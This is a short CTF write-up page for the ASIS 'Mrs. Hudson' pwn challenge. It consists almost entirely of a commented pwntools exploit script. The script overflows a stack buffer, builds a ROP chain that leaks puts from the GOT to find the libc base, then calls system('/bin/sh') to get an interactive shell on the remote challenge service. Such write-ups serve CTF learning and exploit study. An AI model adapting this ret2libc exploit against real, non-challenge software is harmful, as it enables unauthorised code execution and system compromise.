Tags: pwn 

Rating:

full writeup at https://teamrocketist.github.io/2017/09/10/Pwn-ASIS-Mrs-Hudson/

TLDR:
```
from pwn import *
import struct
import time
def getConn():
    """Open the target connection.

    Uses a local process (with the bundled libc preloaded) when the
    module-level `local` flag is set, otherwise the remote service.
    `local` is assigned further down the script but before the first call.
    """
    if local:
        return process('./mrs._hudson', env={"LD_PRELOAD": "./libc.so.6"})
    return remote('178.62.249.106', 8642)
binary = ELF('./mrs._hudson')
libc = ELF('libc.so.6') # got libc from libc-database
# Connection selector for getConn(): False -> talk to the remote CTF service.
local = False
# Fixed addresses for this specific binary (the constant values imply a non-PIE
# build -- inferred, confirm with checksec).
POPRET = 0x00000000004006f3  # gadget used below as `pop rdi; ret` (see ropchain comment)
PUTSPLT = binary.plt['puts']  # puts@plt: callable stub
PUTSGOT = binary.got['puts']  # puts@got: holds the resolved libc address of puts
MAIN = 0x000000000040061A  # presumably main(); re-entered after the leak so a second input is read
# 120 bytes of filler to reach the saved return address; offset is binary-specific.
# A plain overwrite like this only works without a stack canary -- inferred, confirm with checksec.
padding = 'A' * 120
# Stage 1 chain: leak a libc pointer by calling puts(puts@got), then return to MAIN.
# Python 2-era pwntools: p64() returns str here, so str concatenation works; under
# Python 3 these would be bytes.
ropchain = ''
ropchain += p64(POPRET) # POP RDI; RET
ropchain += p64(PUTSGOT) # RDI = address of puts@got (the argument to puts)
ropchain += p64(PUTSPLT) # call puts@plt -> prints the GOT entry, i.e. puts' address in libc
ropchain += p64(MAIN) # return into MAIN so the program reads input again for stage 2
r = getConn()
r.recvline()  # consume the program's initial output line
r.sendline(padding + ropchain)
# Leaked pointer: a canonical user-space x86-64 address has only 6 non-zero low
# bytes and puts stops at the first NUL, so read 6 bytes and pad to 8 before unpacking.
PUTS = u64(r.recv(0x6).ljust(8, '\x00'))
LIBCBASE = PUTS - libc.symbols['puts']  # base = leaked puts - puts' offset in this libc
SYSTEM = LIBCBASE + libc.symbols['system']
BINSH = LIBCBASE + 0x18cd17  # presumably the offset of "/bin/sh" in this libc build -- verify against libc.so.6
log.info("LIBC 0x%x" % LIBCBASE)
log.info("LIBC 0x%x" % PUTS)  # NOTE: label says LIBC but this line prints the leaked puts address
log.info("SYSTEM 0x%x" % SYSTEM)
log.info("Binsh 0x%x" % (BINSH))
r.recvline()  # drain the output produced on re-entering MAIN
r.recvline()
# Stage 2 chain: same pop-rdi gadget, RDI = "/bin/sh" pointer, then system().
r.sendline(padding + p64(POPRET) + p64(BINSH) + p64(SYSTEM))
r.interactive()
r.close()
```

Original writeup (https://teamrocketist.github.io/2017/09/10/Pwn-ASIS-Mrs-Hudson/).